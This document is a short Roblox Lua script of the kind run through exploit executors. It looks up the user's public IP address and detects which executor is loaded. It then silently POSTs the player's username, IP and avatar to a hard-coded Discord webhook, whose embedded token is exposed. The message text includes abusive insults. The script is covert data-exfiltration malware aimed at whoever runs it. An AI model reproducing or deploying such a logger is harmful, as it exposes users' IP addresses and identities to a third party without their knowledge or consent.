x = tostring(game:HttpGet("https://api.ipify.org", true))

local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/1067861667016347679/paDioOIH6snfp7ww85_qQylVu7HCwh7VZLhhLt5p5SiKcZkXqa1wWqpqk3rkEGII4WTl"
local data = {
   ["content"] = "Allah",
   ["embeds"] = {
       {
           ["title"] = "**Allahını skm baran**",
           ["description"] = "Username: **" .. game.Players.LocalPlayer.Name.."** Exploit: **"..webhookcheck.."** İp: **"..x.."**",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
